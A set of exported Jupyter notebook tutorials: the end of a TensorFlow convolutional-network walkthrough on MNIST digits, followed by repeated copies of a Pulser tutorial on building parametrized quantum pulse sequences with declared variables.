tf.app.flags.DEFINE_string("filter_sizes", "5,5,5", "Size of square filters per layer")
tf.app.flags.DEFINE_float("learning_rate", 1e-3, "Learning rate (default: 1e-3)")
tf.app.flags.DEFINE_integer("batch_size", 128, "Batch size (default: 128)")
tf.app.flags.DEFINE_integer("max_steps", 10000, "Number training steps/iterations (default: 1000)")
tf.app.flags.DEFINE_integer("evaluate_every_step", 250, "Evaluate model on validation set after this many steps/iterations (i.e., batches) (default: 50)")
tf.app.flags.DEFINE_string('f', '', 'kernel') # Dummy entry so that colab doesn't complain.
FLAGS = tf.app.flags.FLAGS
print("\nCommand-line Arguments:")
for key in FLAGS.flag_values_dict():
print("{:<22}: {}".format(key.upper(), FLAGS[key].value))
print("")
###Output
Command-line Arguments:
LOG_DIR : /tmp/tensorflow/mnist_cnn/logs
FEATURE_MAP_SIZES : 32,64,128
FILTER_SIZES : 5,5,5
LEARNING_RATE : 0.001
BATCH_SIZE : 128
MAX_STEPS : 10000
EVALUATE_EVERY_STEP : 250
F :
###Markdown
We define some functions that allow us to create `tf.Variables`. Remember that TensorFlow variables are just special tensors, that retain their value across different runs of the graph. Additionally, they are trainable, i.e., the optimizer will change their values during backpropagation, so in the end they represent all the trainable parameters of the model that we want to optimize for.
###Code
def weight_variable(shape):
"""Create a weight variable with appropriate initialization."""
# Initialize variable by drawing from a Gaussian distribution.
# Here, another popular choice is the use Xavier initializers.t
return tf.Variable(tf.truncated_normal(shape, stddev=0.1))
def bias_variable(shape):
"""Create a bias variable with appropriate initialization."""
return tf.Variable(tf.constant(0.1, shape=shape))
def variable_summaries(var):
"""Attach a lot of summaries to a Tensor for TensorBoard visualizations."""
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
###Output
_____no_output_____
###Markdown
Using these functions, we can now define the core of our model. Note that the following functions just create nodes in the computational graph, no actual computation is taking place just yet.
###Code
def dense_layer(input_tensor, output_dim, layer_name, act=tf.nn.relu):
"""
Reusable code for making a simple dense layer connected to the last dimension of `input_tensor`.
It does a matrix multiply, bias add, and then uses an activation to nonlinearize. It also sets
up name scoping so that the resultant graph is easy to read, and adds a number of summary ops.
:param input_tensor: The input tensor to this layer.
:param output_dim: The desired output size we want to map to.
:param layer_name: A name for this layer.
:param act: Activation function used on the output of the dense layer.
:return: The activated output of this layer and its weights.
"""
# Adding a name scope ensures logical grouping of the layers in the graph.
with tf.name_scope(layer_name):
# Get the input dimensionality
input_dim = input_tensor.get_shape()[-1].value
# Note that calling `tensor.get_shape()` retrieves the so called static shape of the tensor.
# The static shape is known at compile time. Some tensor dimensions can be variable, i.e.
# they are only defined during runtime. To retrieve the dynamic shape, i.e. the shape of
# a tensor when actually running computations in the graph, we should call `tf.shape(tensor)`
# instead.
# This Variable will hold the state of the weights for the layer
with tf.name_scope('weights'):
weights = weight_variable([input_dim, output_dim])
variable_summaries(weights)
with tf.name_scope('biases'):
biases = bias_variable([output_dim])
variable_summaries(biases)
with tf.name_scope('Wx_plus_b'):
preactivate = tf.matmul(input_tensor, weights) + biases
tf.summary.histogram('pre_activations', preactivate)
activations = act(preactivate, name='activation')
tf.summary.histogram('activations', activations)
return activations, weights
def conv_layer(input_layer, filter_size, num_filters, layer_name, use_pooling=True):
"""
Adds a convolutional layer to `input_layer`. Produces an output tensor of shape
`[batch_size, input_height/k, input_width/k, num_filters]` where `k = 2` if
`use_pooling` is activated or 1 otherwise.
:param input_layer: The input to this layer. Expected is a tensor of shape
`[batch_size, input_height, input_width, input_channels]`
:param filter_size: Width and height of the filter (scalar).
:param num_filters: How many feature maps to produce with this layer.
:param layer_name: A name for this layer.
:param use_pooling: Use 2x2 max-pooling if True.
:return: The output of this layer and the filter weights.
"""
with tf.name_scope(layer_name):
# First determine the input channel size
num_input_channels = input_layer.get_shape()[-1].value
# Shape of the filter-weights for the convolution.
# This format is determined by the TensorFlow API.
shape = [filter_size, filter_size, num_input_channels, num_filters]
# Create new weights aka. filters with the given shape.
weights = weight_variable(shape=shape)
# Create new biases, one for each filter.
biases = bias_variable(shape=[num_filters])
# Create the TensorFlow operation for convolution.
# Note the strides are set to 1 in all dimensions.
# The first and last stride must always be 1,
# because the first is for the image-number and
# the last is for the input-channel.
# But e.g. strides=[1, 2, 2, 1] would mean that the filter
# is moved 2 pixels across the x- and y-axis of the image.
# The padding is set to 'SAME' which means the input image
# is padded with zeroes so the size of the output is the same.
layer = tf.nn.conv2d(input=input_layer,
filter=weights,
strides=[1, 1, 1, 1],
padding='SAME')
# Add the biases to the results of the convolution.
# A bias-value is added to each filter-channel.
layer += biases
# Use pooling to down-sample the image resolution?
if use_pooling:
# This is 2x2 max-pooling, which means that we
# consider 2x2 windows and select the largest value
# in each window. Then we move 2 pixels to the next window.
layer = tf.nn.max_pool(value=layer,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
# Rectified Linear Unit (ReLU).
# It calculates max(x, 0) for each input pixel x.
# This adds some non-linearity to the formula and allows us
# to learn more complicated functions.
layer = tf.nn.relu(layer)
# Note that ReLU is normally executed before the pooling,
# but since relu(max_pool(x)) == max_pool(relu(x)) we can
# save 75% of the relu-operations by max-pooling first.
# We return both the resulting layer and the filter-weights
# because we will plot the weights later.
return layer, weights
def flatten_layer(layer):
"""
A helper function to flatten the output of a convolutional layer. As a conv layer
outputs a 4-dimensional tensor, we need to reduce it to 2 dimensions so that
we can use it as an input the a dense layer.
:param layer: The output of a convolutional layer.
:return: The input layer flattened to have shape `[batch_size, num_features]`
"""
# Get the shape of the input layer.
layer_shape = layer.get_shape()
# The shape of the input layer is assumed to be:
# layer_shape == [num_images, img_height, img_width, num_channels]
# The number of features is: img_height * img_width * num_channels
# We can use a function from TensorFlow to calculate this.
num_features = layer_shape[1:4].num_elements()
# Reshape the layer to [batch_size, num_features].
# Note that we just set the size of the second dimension
# to num_features and the size of the first dimension to -1
# which means the size in that dimension is calculated
# so the total size of the tensor is unchanged from the reshaping.
layer_flat = tf.reshape(layer, [-1, num_features])
# The shape of the flattened layer is now:
# [num_images, img_height * img_width * num_channels]
# Return both the flattened layer and the number of features.
return layer_flat, num_features
###Output
_____no_output_____
###Markdown
With this we can now construct the model. The last thing we need to do so, is set up placeholders through which we can feed values into the model. Recall that placeholders are just special tensors for which TensorFlow checks that they have been supplied appropriately when ever running a computation in the graph. Note that the first dimension of each placeholder is `None`. This means that the actual size of that dimension is unknown at compile time and thus can vary at runtime. This is a useful feature especially for the batch size.
###Code
# Create input placeholders
with tf.name_scope('input'):
# This is the format how we read MNIST images.
images_flat = tf.placeholder(tf.float32, [None, img_size_flat], name='x-input')
# We reshape this so that we can feed it directly into a conv layer.
data_placeholder = tf.reshape(images_flat, [-1, img_size, img_size, num_image_channels])
# Also create a placeholder for the target labels
label_placeholder = tf.placeholder(tf.int32, [None], name='y-input')
# Extract design parameters from the command line
feature_map_sizes = list(map(int, FLAGS.feature_map_sizes.split(',')))
filter_sizes = list(map(int, FLAGS.filter_sizes.split(',')))
assert len(filter_sizes) == len(feature_map_sizes)
# Build the actual model
next_in = data_placeholder
weights = []
layer_outs = []
for i, (num_out_channels, filter_size) in enumerate(zip(feature_map_sizes, filter_sizes)):
next_in, w = conv_layer(next_in, filter_size, num_out_channels, 'conv{}_layer'.format(i), use_pooling=True)
weights.append(w)
layer_outs.append(next_in)
# Flatten the output
out_flat, _ = flatten_layer(next_in)
# Add a dense layer with 10 output neurons, i.e. one for every class from 0-9
logits, _ = dense_layer(out_flat, num_classes, 'dense_layer', act=tf.identity)
probs = tf.nn.softmax(logits)
###Output
_____no_output_____
###Markdown
Note that we did not use an activation function on the output of the dense layer. Generally speaking, it is not always reasonable to use an activation function on the last layer, depending on the distribution of your outputs. For example, if you used a `tf.nn.tanh` activation on your output layer, all outputs would come to lie between -1 and 1. While an activation function on the outputs is a trick to define the output range for free, it is inherently biased. In other words, the distribution of output values does not match with the shape of the activation function. Depending on your problem, this might or might not make sense. For our case, we want the outputs of the model to be probabilities, i.e., the model should tell us what is the probability that a certain image belongs to each of the 10 classes. For this, we can use the softmax activation function, defined as follows:$$\sigma(\mathbf{z})_j = \frac{e^{\mathbf{z}_j}}{\sum_{k=1}^K e^{\mathbf{z}_k}}$$where $\mathbf{z}$ is our $K$-dimensional output vector `logits` and $K$ refers to the number of classes that we are trying to predict, i.e. $K=10$ in our case. The softmax function essentially squashes its input between 0 and 1 and makes sure that all $K$ values sum up to 1. In other words, it produces a valid probability distribution over the number of classes.So, how come we did not supply `tf.nn.softmax` to our dense layer above? The reason is that when we feed softmax-activated values to our loss function, we introduce numerical instabilities that destabilize the training. The loss function measures how good the prediction of our network is. Ideally, if we feed an image depicting a hand-written 3 to our model, we want it to assign a probability of 1 to the class 3 and probabilities of 0 to all other classes. Thus, for every image we have a target distribution $q$, which is just a one-hot encoding of its label, and an estimated probability distribution $p$ which is the output of the model. A one-hot encoding of a label is simply a vector of zeros that has exactly one entry showing 1 corresponding to the index of that label. For example, the one-hot encoding of label 3 looks like this:$$\left[0, 0, 0, 1, 0, 0, 0, 0, 0, 0 \right]^T \in \mathbb{R}^{10}$$The only thing left is now to find a measure of the distance between those two distributions, i.e. how closely $p$ resembles the one-hot encoding $q$. For this, we can use the cross-entropy:$$H(p, q) = H(p) + D_{KL}(p || q) = -\sum\limits_x p(x) \log q(x)$$where $H(p)$ is the entropy of $p$ and $D_{KL}$ is the Kullback-Leibler Divergence. You can see from this formula that if the predicted probability $p$ is exactly a one-hot encoding, $H(p, q)$ will be 0, because the entropy $H(p)$ of a one-hot vector is 0 and the KL divergence will also be 0 because $p$ exactly matches $q$.The problem with the cross-entropy, as mentioned before, is that it is numerically unstable and can produce `inf` values during training. Hence, TensorFlow produces a more stable version which takes as input the logits, _not_ the softmax activated values. This is why we did not choose an activation function for the outputs of the dense layer.
###Code
# Loss: Cross-Entropy
with tf.name_scope('cross_entropy'):
# So here we use tf.nn.softmax_cross_entropy_with_logits on the
# raw outputs of the nn_layer above, and then average across
# the batch.
cross_entropy_loss = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=label_placeholder))
tf.summary.scalar('cross_entropy_loss', cross_entropy_loss)
###Output
_____no_output_____
###Markdown
Now that we defined the model and the loss, we must also choose the optimizer. Before doing so, it might be a good idea to check how many trainable parameters we've created with the model definition above. This is both a sanity check and also gives you an intuition about the capacity of the model.
###Code
def count_trainable_parameters():
"""Counts the number of trainable parameters in the current default graph."""
tot_count = 0
for v in tf.trainable_variables():
v_count = 1
for d in v.get_shape():
v_count *= d.value
tot_count += v_count
return tot_count
print("Number of trainable parameters: {}".format(count_trainable_parameters()))
###Output
Number of trainable parameters: 277514
###Markdown
With this, it is time to define our optimizer.
###Code
# Create a variable to contain a counter for the global training step.
global_step = tf.Variable(1, name='global_step', trainable=False)
# Optimization operation: SGD (Stochastic Gradient Descent)
with tf.name_scope('train'):
# This operation automatically increases the `global_step` by 1 every time it is called
train_step = tf.train.GradientDescentOptimizer(FLAGS.learning_rate).minimize(
cross_entropy_loss, global_step=global_step)
# Additionally want to monitor the accuracy of the training, not just the cross-entropy value.
with tf.name_scope('accuracy'):
with tf.name_scope('correct_predictions'):
#predictions = tf.argmax(logits, 1, name="predictions")
correct_predictions = tf.nn.in_top_k(logits, label_placeholder, 1)
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32))
tf.summary.scalar('accuracy', accuracy)
###Output
_____no_output_____
###Markdown
At this point we are almost ready to start the training. The only thing left to do is start the session (hopefully on the GPU), add some helper functions to feed data into the model and prepare some summary writers so that we can monitor the progress in TensorBoard.
###Code
# Create the session
sess = tf.InteractiveSession()
# Tensorboard
train_writer = tbc.get_deep_writers("single_layer_model/train")
train_writer.add_graph(sess.graph)
valid_writer = tbc.get_deep_writers("single_layer_model/valid")
valid_writer.add_graph(sess.graph)
# Initialize all variables
sess.run(tf.global_variables_initializer())
# To be able to see something in tensorboard, we must merge summaries to one common operation.
# Whenever we want to write summaries, we must request this operation from the graph.
# Note: creating the file writers should happen after the session was launched.
summaries_merged = tf.summary.merge_all()
def feed_dict(train_mode):
"""Make a TensorFlow feed_dict: maps data onto placeholders."""
if train_mode:
xs, ys = mnist.train.next_batch(FLAGS.batch_size)
else:
xs, ys = mnist.validation.images, mnist.validation.labels
return {images_flat:xs, label_placeholder:ys}
def do_train_step(num_steps, summary_op):
"""Perform as many training steps as specified and may be evaluate on validation set."""
for i in range(num_steps):
step = tf.train.global_step(sess, global_step)
if step % FLAGS.evaluate_every_step == 0:
# Record summaries and test-set accuracy
summary, acc_valid = sess.run([summary_op, accuracy], feed_dict=feed_dict(False))
valid_writer.add_summary(summary, step)
print('[{}] Accuracy Training [{:.3f}], Validation [{:.3f}]'.format(step, acc_valid, acc_train))
# Record train set summaries, and train
summary, acc_train, _ = sess.run([summary_op, accuracy, train_step], feed_dict=feed_dict(True))
train_writer.add_summary(summary, step)
###Output
_____no_output_____
###Markdown
Now let's train this model for a couple of steps.
###Code
do_train_step(1001, summaries_merged)
train_writer.flush()
valid_writer.flush()
###Output
[250] Accuracy Training [0.768], Validation [0.750]
[500] Accuracy Training [0.855], Validation [0.820]
[750] Accuracy Training [0.885], Validation [0.883]
[1000] Accuracy Training [0.906], Validation [0.906]
###Markdown
You will see training loss, distribution of weight & bias parameter values and our graph. You can see that the accuracy on the validation set steadily increases. Sometimes it might be interesting to see some visualizations of the learned convolutional filter weights or the outputs of layer. Let's define some helper functions to do that.
###Code
def plot_conv_weights(session, weights, input_channel=0):
"""Helper-function for plotting convolutional weights."""
# Assume weights are TensorFlow ops for 4-dim variables
# e.g. weights_conv1 or weights_conv2.
# Retrieve the values of the weight-variables from TensorFlow.
# A feed-dict is not necessary because nothing is calculated.
w = session.run(weights)
# Get the lowest and highest values for the weights.
# This is used to correct the colour intensity across
# the images so they can be compared with each other.
w_min = np.min(w)
w_max = np.max(w)
# Number of filters used in the conv. layer.
num_filters = w.shape[3]
# Number of grids to plot.
# Rounded-up, square-root of the number of filters.
num_grids = math.ceil(math.sqrt(num_filters))
# Create figure with a grid of sub-plots.
fig, axes = plt.subplots(num_grids, num_grids)
# Plot all the filter-weights.
for i, ax in enumerate(axes.flat):
# Only plot the valid filter-weights.
if i<num_filters:
# Get the weights for the i'th filter of the input channel.
# See new_conv_layer() for details on the format
# of this 4-dim tensor.
img = w[:, :, input_channel, i]
# Plot image.
ax.imshow(img, vmin=w_min, vmax=w_max,
interpolation='nearest', cmap='seismic')
# Remove ticks from the plot.
ax.set_xticks([])
ax.set_yticks([])
# Ensure the plot is shown correctly with multiple plots
# in a single Notebook cell.
plt.show()
def plot_conv_layer(layer, image):
"""Helper-function for plotting the output of a convolutional layer."""
# Assume layer is a TensorFlow op that outputs a 4-dim tensor
# which is the output of a convolutional layer,
# e.g. layer_conv1 or layer_conv2.
# Create a feed-dict containing just one image.
# Note that we don't need to feed y_true because it is
# not used in this calculation.
feed_dict = {images_flat: [image]}
# Calculate and retrieve the output values of the layer
# when inputting that image.
values = sess.run(layer, feed_dict=feed_dict)
# Number of filters used in the conv. layer.
num_filters = values.shape[3]
# Number of grids to plot.
# Rounded-up, square-root of the number of filters.
num_grids = math.ceil(math.sqrt(num_filters))
# Create figure with a grid of sub-plots.
fig, axes = plt.subplots(num_grids, num_grids)
# Plot the output images of all the filters.
for i, ax in enumerate(axes.flat):
# Only plot the images for valid filters.
if i<num_filters:
# Get the output image of using the i'th filter.
# See new_conv_layer() for details on the format
# of this 4-dim tensor.
img = values[0, :, :, i]
# Plot image.
ax.imshow(img, interpolation='nearest', cmap='binary')
# Remove ticks from the plot.
ax.set_xticks([])
ax.set_yticks([])
# Ensure the plot is shown correctly with multiple plots
# in a single Notebook cell.
plt.show()
plot_conv_weights(sess, weights=weights[0])
###Output
_____no_output_____
###Markdown
Because we trained the model only for a few epochs, the validation accuracy is not overwhelming. Let's train more.
###Code
do_train_step(10000, summaries_merged)
plot_conv_weights(sess, weights=weights[0])
###Output
[1250] Accuracy Training [0.919], Validation [0.922]
[1500] Accuracy Training [0.927], Validation [0.922]
[1750] Accuracy Training [0.935], Validation [0.953]
[2000] Accuracy Training [0.939], Validation [0.945]
[2250] Accuracy Training [0.942], Validation [0.961]
[2500] Accuracy Training [0.946], Validation [0.922]
[2750] Accuracy Training [0.946], Validation [0.945]
[3000] Accuracy Training [0.950], Validation [0.961]
[3250] Accuracy Training [0.949], Validation [0.953]
[3500] Accuracy Training [0.954], Validation [0.930]
[3750] Accuracy Training [0.956], Validation [0.930]
[4000] Accuracy Training [0.956], Validation [0.953]
[4250] Accuracy Training [0.957], Validation [0.961]
[4500] Accuracy Training [0.958], Validation [0.977]
[4750] Accuracy Training [0.961], Validation [0.953]
[5000] Accuracy Training [0.961], Validation [0.984]
[5250] Accuracy Training [0.963], Validation [0.953]
[5500] Accuracy Training [0.962], Validation [0.977]
[5750] Accuracy Training [0.964], Validation [0.984]
[6000] Accuracy Training [0.964], Validation [0.984]
[6250] Accuracy Training [0.964], Validation [0.961]
[6500] Accuracy Training [0.965], Validation [0.969]
[6750] Accuracy Training [0.966], Validation [0.961]
[7000] Accuracy Training [0.967], Validation [0.969]
[7250] Accuracy Training [0.968], Validation [0.953]
[7500] Accuracy Training [0.968], Validation [0.969]
[7750] Accuracy Training [0.967], Validation [0.969]
[8000] Accuracy Training [0.969], Validation [0.969]
[8250] Accuracy Training [0.970], Validation [0.969]
[8500] Accuracy Training [0.970], Validation [0.945]
[8750] Accuracy Training [0.969], Validation [0.984]
[9000] Accuracy Training [0.971], Validation [0.969]
[9250] Accuracy Training [0.971], Validation [0.977]
[9500] Accuracy Training [0.971], Validation [0.961]
[9750] Accuracy Training [0.971], Validation [0.977]
[10000] Accuracy Training [0.972], Validation [0.969]
[10250] Accuracy Training [0.973], Validation [0.977]
[10500] Accuracy Training [0.972], Validation [0.961]
[10750] Accuracy Training [0.974], Validation [0.984]
[11000] Accuracy Training [0.973], Validation [0.984]
###Markdown
Once you trained the model for a longer period of time, you should achieve a validation accuracy of above 95 %. Next, we can look at how the model performs on some examples taken from the test set.
###Code
# Feed some test images into the model and get the predicted label
test_images = mnist.test.images[0:9]
# Get the true classes for those images.
test_cls_true = mnist.test.labels[0:9]
# Feed the images into the model and get the predictions
feed_dict = {images_flat: test_images}
logits_np = sess.run(logits, feed_dict)
# logits_np has shape [9, 10], find the class with the highest probability for each
test_cls_predicted = np.argmax(logits_np, axis=-1)
# then visualize
plot_images(test_images, test_cls_true, test_cls_predicted)
###Output
_____no_output_____
###Markdown
Assuming the model was trained for long enough, you should now see that the model has performed quite well on these 9 images.May be for a certain image, you are also interested in visualizing the output of a convolutional layer, i.e. its resulting feature maps. For the first image in the test data set, i.e. the one showing number 7 in the above plot, this would look like follows:
###Code
plot_conv_layer(layer_outs[0], mnist.test.images[0])
###Output
_____no_output_____
###Markdown
That's it - we've successfully trained a convolutional neural network for classification of hand-written digits. Lastly, let's not forget to clean up after us.
###Code
# cleanup
sess.close()
###Output
_____no_output_____ |
tutorials/composition/Parametrized Sequences.ipynb | ###Markdown
Parametrized Sequences
###Code
import numpy as np
import pulser
from pulser import Pulse, Sequence, Register
from pulser.waveforms import RampWaveform, BlackmanWaveform, CompositeWaveform
from pulser.devices import Chadoq2
###Output
_____no_output_____
###Markdown
From simple sweeps to variational quantum algorithms, it is often the case that one wants to try out multiple pulse sequences that vary only in a few parameters. For this effect, the ability to make a `Sequence` **parametrized** was developed.A parametrized `Sequence` can be used just like a "regular" `Sequence`, with a few key differences. Initialization and channel declaration, for example, don't change at all:
###Code
reg = Register.square(2, prefix='q')
seq = Sequence(reg, Chadoq2)
seq.declare_channel('rydberg', 'rydberg_global')
seq.declare_channel('raman', 'raman_local')
###Output
_____no_output_____
###Markdown
Variables and Parametrized Objects The defining characteristic of a `Sequence` that is parametrized is it's use of **variables**. These variables are declared within a `Sequence`, by calling:
###Code
Omega_max = seq.declare_variable('Omega_max')
ts = seq.declare_variable('ts', size=2, dtype=int)
last_target = seq.declare_variable('last_target', dtype=str)
###Output
_____no_output_____
###Markdown
The returned `Omega_max`, `ts` and `last_target` objects are of type `Variable`, and are defined by their name, size and data type. In this case, `Omega_max` is a variable of `size=1` and `dtype=float` (the default), `ts` is an array of two `int` values and `last_target` is a string.These returned `Variable` objects support simple arithmetic operations (when applicable) and, when of `size > 1`, even item indexing. Take the following examples:
###Code
t_rise, t_fall = ts # Unpacking is possible too
U = Omega_max / 2.3
delta_0 = -6 * U
delta_f = 2 * U
t_sweep = (delta_f - delta_0)/(2 * np.pi * 10) * 1000
###Output
_____no_output_____
###Markdown
Both the original `Variables` and the results of these operations serve as valid inputs for `Waveforms`, `Pulses` or `Sequence`-building instructions. We can take `Omega_max` as an argument for a waveform:
###Code
pi_wf = BlackmanWaveform.from_max_val(Omega_max, np.pi)
###Output
_____no_output_____
###Markdown
or use derived quantities, like `t_rise`, `t_fall`, `delta_0` and `delta_f`:
###Code
rise_wf = RampWaveform(t_rise, delta_0, delta_f)
fall_wf = RampWaveform(t_fall, delta_f, delta_0)
rise_fall_wf = CompositeWaveform(rise_wf, fall_wf)
###Output
_____no_output_____
###Markdown
These waveforms are *parametrized* objects, so usual attributes like `duration` or `samples` are not available, as they depend on the values of the underlying variables. Nonetheless, they can be used as regular waveforms when creating `Pulses`, which will consequently be *parametrized* too.
###Code
pi_pulse = Pulse.ConstantDetuning(pi_wf, 0, 0)
rise_fall = Pulse.ConstantAmplitude(Omega_max, rise_fall_wf, 0)
###Output
_____no_output_____
###Markdown
Constructing the Sequence Upon initialization, a `Sequence` is, by default, not parametrized. We can check this by calling:
###Code
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
While it is not parametrized, it is just a normal sequence. We can do the usual sutff, like targeting a local channel, adding regular pulses, or plotting the sequence:
###Code
generic_pulse = Pulse.ConstantPulse(100, 2*np.pi, 2, 0.)
seq.add(generic_pulse, "rydberg")
seq.target("q0", "raman")
seq.add(generic_pulse, "raman")
seq.draw()
###Output
_____no_output_____
###Markdown
The `Sequence` becomes parametrized at the moment a parametrized object or variable is given to a sequence-building instruction. For example:
###Code
seq.target(last_target, "raman")
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
From this point onward, functionalities like drawing are no longer available, because the instructions start being stored instead of executed on the fly. We can still check the current state of a parametrized sequence by printing it:
###Code
print(seq)
###Output
Prelude
-------
Channel: rydberg
t: 0 | Initial targets: q2, q1, q0, q3 | Phase Reference: 0.0
t: 0->100 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q2, q1, q0, q3
Channel: raman
t: 0 | Initial targets: q0 | Phase Reference: 0.0
t: 0->100 | Delay
t: 100->200 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q0
Stored calls
------------
1. target(last_target, raman)
###Markdown
Naturally, we can also add the parametrized pulses we previously created:
###Code
seq.add(rise_fall, "rydberg")
seq.add(pi_pulse, "raman")
###Output
_____no_output_____
###Markdown
Building Once we're happy with our parametrized sequence, the last step is to build it into a regular sequence. For that, we call the `Sequence.build()` method, in which we **must attribute values for all the declared variables**:
###Code
built_seq = seq.build(Omega_max = 2.3 * 2*np.pi, ts = [200, 500], last_target="q3")
built_seq.draw()
###Output
_____no_output_____
###Markdown
And here we have a regular sequence, built from our parametrized sequence. To create a new one with different parameters, we can simply build it again with new values:
###Code
alt_seq = seq.build(Omega_max = 2*np.pi, ts = [400, 100], last_target="q2")
alt_seq.draw()
###Output
_____no_output_____
###Markdown
Parametrized Sequences
###Code
import numpy as np
import pulser
from pulser import Pulse, Sequence, Register
from pulser.waveforms import RampWaveform, BlackmanWaveform, CompositeWaveform
from pulser.devices import Chadoq2
###Output
_____no_output_____
###Markdown
From simple sweeps to variational quantum algorithms, it is often the case that one wants to try out multiple pulse sequences that vary only in a few parameters. For this effect, the ability to make a `Sequence` **parametrized** was developed.A parametrized `Sequence` can be used just like a "regular" `Sequence`, with a few key differences. Initialization and channel declaration, for example, don't change at all:
###Code
reg = Register.square(2, prefix='q')
seq = Sequence(reg, Chadoq2)
seq.declare_channel('rydberg', 'rydberg_global')
seq.declare_channel('raman', 'raman_local')
###Output
_____no_output_____
###Markdown
Variables and Parametrized Objects The defining characteristic of a parametrized `Sequence` is its use of **variables**. These variables are declared within a `Sequence`, by calling:
###Code
Omega_max = seq.declare_variable('Omega_max')
ts = seq.declare_variable('ts', size=2, dtype=int)
last_target = seq.declare_variable('last_target', dtype=str)
###Output
_____no_output_____
###Markdown
The returned `Omega_max`, `ts` and `last_target` objects are of type `Variable`, and are defined by their name, size and data type. In this case, `Omega_max` is a variable of `size=1` and `dtype=float` (the default), `ts` is an array of two `int` values and `last_target` is a string.These returned `Variable` objects support simple arithmetic operations (when applicable) and, when of `size > 1`, even item indexing. Take the following examples:
###Code
t_rise, t_fall = ts # Unpacking is possible too
U = Omega_max / 2.3
delta_0 = -6 * U
delta_f = 2 * U
t_sweep = (delta_f - delta_0)/(2 * np.pi * 10) * 1000
###Output
_____no_output_____
###Markdown
Both the original `Variables` and the results of these operations serve as valid inputs for `Waveforms`, `Pulses` or `Sequence`-building instructions. We can take `Omega_max` as an argument for a waveform:
###Code
pi_wf = BlackmanWaveform.from_max_val(Omega_max, np.pi)
###Output
_____no_output_____
###Markdown
or use derived quantities, like `t_rise`, `t_fall`, `delta_0` and `delta_f`:
###Code
rise_wf = RampWaveform(t_rise, delta_0, delta_f)
fall_wf = RampWaveform(t_fall, delta_f, delta_0)
rise_fall_wf = CompositeWaveform(rise_wf, fall_wf)
###Output
_____no_output_____
###Markdown
These waveforms are *parametrized* objects, so usual attributes like `duration` or `samples` are not available, as they depend on the values of the underlying variables. Nonetheless, they can be used as regular waveforms when creating `Pulses`, which will consequently be *parametrized* too.
###Code
pi_pulse = Pulse.ConstantDetuning(pi_wf, 0, 0)
rise_fall = Pulse.ConstantAmplitude(Omega_max, rise_fall_wf, 0)
###Output
_____no_output_____
###Markdown
Constructing the Sequence Upon initialization, a `Sequence` is, by default, not parametrized. We can check this by calling:
###Code
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
While it is not parametrized, it is just a normal sequence. We can do the usual stuff, like targeting a local channel, adding regular pulses, or plotting the sequence:
###Code
generic_pulse = Pulse.ConstantPulse(100, 2*np.pi, 2, 0.)
seq.add(generic_pulse, "rydberg")
seq.target("q0", "raman")
seq.add(generic_pulse, "raman")
seq.draw()
###Output
_____no_output_____
###Markdown
The `Sequence` becomes parametrized at the moment a parametrized object or variable is given to a sequence-building instruction. For example:
###Code
seq.target(last_target, "raman")
seq.is_parametrized()
###Output
_____no_output_____
###Markdown
From this point onward, functionalities like drawing are no longer available, because the instructions start being stored instead of executed on the fly. We can still check the current state of a parametrized sequence by printing it:
###Code
print(seq)
###Output
Prelude
-------
Channel: rydberg
t: 0 | Initial targets: q2, q1, q0, q3 | Phase Reference: 0.0
t: 0->100 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q2, q1, q0, q3
Channel: raman
t: 0 | Initial targets: q0 | Phase Reference: 0.0
t: 0->100 | Delay
t: 100->200 | Pulse(Amp=6.28 rad/µs, Detuning=2 rad/µs, Phase=0) | Targets: q0
Stored calls
------------
1. target(last_target, raman)
###Markdown
Naturally, we can also add the parametrized pulses we previously created:
###Code
seq.add(rise_fall, "rydberg")
seq.add(pi_pulse, "raman")
###Output
_____no_output_____
###Markdown
Building Once we're happy with our parametrized sequence, the last step is to build it into a regular sequence. For that, we call the `Sequence.build()` method, in which we **must attribute values for all the declared variables**:
###Code
built_seq = seq.build(Omega_max = 2.3 * 2*np.pi, ts = [200, 500], last_target="q3")
built_seq.draw()
###Output
_____no_output_____
###Markdown
And here we have a regular sequence, built from our parametrized sequence. To create a new one with different parameters, we can simply build it again with new values:
###Code
alt_seq = seq.build(Omega_max = 2*np.pi, ts = [400, 100], last_target="q2")
alt_seq.draw()
###Output
_____no_output_____
###Markdown
Parametrized Sequences
###Code
import numpy as np
import pulser
from pulser import Pulse, Sequence, Register
from pulser.waveforms import RampWaveform, BlackmanWaveform, CompositeWaveform
from pulser.devices import Chadoq2
###Output
_____no_output_____
###Markdown
From simple sweeps to variational quantum algorithms, it is often the case that one wants to try out multiple pulse sequences that vary only in a few parameters. For this effect, the ability to make a `Sequence` **parametrized** was developed.A parametrized `Sequence` can be used just like a "regular" `Sequence`, with a few key differences. Initialization and channel declaration, for example, don't change at all:
###Code
reg = Register.square(2, prefix='q')
seq = Sequence(reg, Chadoq2)
seq.declare_channel('rydberg', 'rydberg_global')
seq.declare_channel('raman', 'raman_local')
###Output
_____no_output_____
###Markdown
Variables and Parametrized Objects The defining characteristic of a parametrized `Sequence` is its use of **variables**. These variables are declared within a `Sequence`, by calling:
###Code
Omega_max = seq.declare_variable('Omega_max')
ts = seq.declare_variable('ts', size=2, dtype=int)
last_target = seq.declare_variable('last_target', dtype=str)
###Output
_____no_output_____
###Markdown
The returned `Omega_max`, `ts` and `last_target` objects are of type `Variable`, and are defined by their name, size and data type. In this case, `Omega_max` is a variable of `size=1` and `dtype=float` (the default), `ts` is an array of two `int` values and `last_target` is a string.These returned `Variable` objects support simple arithmetic operations (when applicable) and, when of `size > 1`, even item indexing. Take the following examples:
###Code
t_rise, t_fall = ts # Unpacking is possible too
U = Omega_max / 2.3
delta_0 = -6 * U
delta_f = 2 * U
